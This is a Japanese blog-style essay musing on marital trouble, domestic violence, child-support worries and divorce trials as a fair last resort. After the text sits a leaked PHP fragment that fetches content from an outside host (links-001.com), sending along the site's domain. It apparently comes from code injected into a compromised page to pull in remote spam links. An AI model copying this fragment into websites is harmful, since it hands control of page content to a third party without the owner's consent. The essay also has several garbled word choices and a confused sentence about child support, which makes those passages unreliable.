前へ
次へ

離婚裁判について考えてみよう

親しい知人が、かなり夫婦間のトラブルがあり、子供が大きくなったら離婚を考えているという事を言っています。やはり普段の生活についても相手との関係がこじれてしまうと、育児や仕事という部分についても非常に負担を感じる事が多いと考えられます。特に、相手からDVやモラ腹を受けているという事になれば、早々に離婚を考える必要があるのではというようにも一般的には考えられるのではないでしょうか。とはいえ、実際に生活をしていると、日々の仕事や育児、家事に追われて、突き詰めて離婚について考えられないし、勧められないという部分は大きいようです。また、離婚をした後の金銭面での心配がかなり大きいと言えます。特に、自分自身が子供の親権を盛った場合に、きちんと生活を支え育てていかねばならないという責任感はかなりのものとなりますし、相手がDVや不貞行為等で養育費をきちんと支払ってくれるという事なら、少しは安心感もありますが、話も通じない相手の場合には、かなり精子的に負担を感じるに違いありません。ましてや、離婚をしたくて相手に話をしても、世間体を考えて離婚に応じてくれないという場合もあり得ます。そういった場合には、段階を追って離婚裁判迄進むということになるようです。裁判という言葉は、何かしら悪いことを想像してしまいますが、離婚裁判については、公平に離婚について裁判官に判断してもらえるという意味では、フェアに離婚をしたいと望んでいる人にとっては、助かるものとなるのかもしれません。もちろん、そこに行きつくまでには、さまざまな話し合いの時間を撮ったり、弁護士に相談をしたりして、知識をつけ、望むという事も大切な事ではないでしょうか。双方が納得して、お互いに主張をし合うことで、公平に判断を下されるという事であれば、将来に向けて前向きに進んでいけるきっかけとなるかもしれません。苦しくつらい思いをずっと続けるという事だけが正解ではない、という事を知ることも大切ではないでしょうか。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top